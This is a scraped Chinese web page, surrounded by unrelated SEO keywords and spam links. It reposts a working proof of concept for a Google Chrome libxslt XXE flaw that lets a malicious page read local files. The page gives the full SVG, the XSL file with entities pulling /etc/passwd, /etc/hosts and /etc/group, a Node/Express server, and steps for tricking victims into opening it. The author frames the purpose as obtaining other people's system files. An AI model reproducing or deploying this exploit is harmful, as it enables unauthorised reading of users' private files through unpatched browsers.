当前位置: 首页 > news >正文

wordpress安全防护长沙网站优化

wordpress安全防护,长沙网站优化,建设网站收费,怎么做根优酷差不多的网站漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Li…

漏洞描述

该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限

影响的版本Google Chrome < 116.0.5845.96

效果如下:

Google Chrome下载地址:https://registry.npmmirror.com/binary.html?path=chromedriver/

根据自己需求下载即可

这里我们要用到三个文件,将这三个文件传入到自己搭建的web服务文件中即可,也可以是博客网站的文件中,总之是可以用浏览器访问的就好,那我们看那三个文件吧

test.svg

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="#"?><xsl:stylesheet id="color-change" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1000 1000"><foreignObject id="myObj" width="1000" height="1000"><div style="font-size:xxx-large" xmlns="http://www.w3.org/1999/xhtml"><a href="#">#Copy me#</a><br/>XSL: <xsl:value-of select="system-property('xsl:version')"/><br/>Vendor: <xsl:value-of select="system-property('xsl:vendor')"/><br/>Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/><br/>document() <xsl:copy-of  select="document('test.xsl')"/></div></foreignObject></svg></xsl:template>
</xsl:stylesheet>

text.xsl

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE p [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY group SYSTEM "file://localhost/etc/group">
]> <p><p style="border-style: dotted;">/etc/passwd: 
&passwd;</p><p style="border-style: dotted;">/etc/hosts:
&hosts;</p><p style="border-style: dotted;">/etc/group:
&group;</p>
</p>

server.js

const express = require('express');
const path = require('path');const app = express();
const port = 3000;app.get('/test.svg', (req, res) => {res.sendFile(path.join(__dirname, 'test.svg'));
});app.get('/test.xsl', (req, res) => {res.set('Access-Control-Allow-Origin', '*');res.sendFile(path.join(__dirname, 'test.xsl'));
});app.listen(port, () => {console.log(`Example app listening on port ${port}`);
});

要将这三个文件放到自己搭建的web服务的文件中即可,也可以是博客网站的文件下

(注意这里的三个文件是linux的版本,也就是说Google Chrome也要是linux版本的才可以用,如果要用windows版本的则需要对这三个文件进行修改,然后下个windows版本的Google Chrome即可)

而这里要注意的是我们必须要用Google Chrome才能获取到别人的信息

Google Chrome打开上面的上传的文件,如:http://xxx.xxx.xxx/test.svg

然后我们就可以看到如下图所示获取到别人的本机的 passwd 文件和 hosts 文件

http://www.yidumall.com/news/80881.html

相关文章:

  • qq空间怎么跟网站做链接吗网络推广公司服务内容
  • 餐饮业建设网站意义青岛网站推广公司排名
  • 用什么软件做网站前端制作网页完整步骤代码
  • 福州网站建设 网站设计 网站制作苏州关键词优化搜索排名
  • 免费网站建站WWW222流量推广怎么做
  • 罗庄区建设局网站朋友圈广告推广文字
  • 怎样做视频播放网站搜索引擎优化实验报告
  • 网站一直百度上搜不到是怎么回事做一个个人网站
  • 濮阳市城乡一体化示范区西湖医院seo文章
  • 湖北望新建设有限公司网站seo 技术优化
  • centos6搭建wordpress关键词推广优化排名品牌
  • wordpress logseo整站优化哪家好
  • 大连专业做网站好用的视频播放器app
  • 慕课Java电商网站开发搜索关键词的方法
  • 苏州网页设计多少钱优化大师是什么
  • 做网站怎么加弹幕搜索百度
  • 东莞企业网站推广哪里好数据分析网站
  • 免费建站网站优化营商环境 提升服务效能
  • 沈阳网站制作哪家好网络推广是做什么工作的
  • 免费建站网站大全怎么找关键词
  • 深圳专业做网站设计公司如何免费建立一个网站
  • 阿里云的网站接入方式企业seo案例
  • 制作网站公司 可以要求后续修改吗常用的seo工具推荐
  • 做化学合成的网站有哪些网站域名备案信息查询
  • 做推广的网站需要注意什么谷歌seo排名优化
  • 台州网站制作网页新一轮疫情最新消息
  • 网站建设和优化的步骤今天有哪些新闻
  • wordpress副标题字数seo案例分析方案
  • 手机制作钓鱼网站百度seo和sem
  • 韩国网页设计网站冬镜seo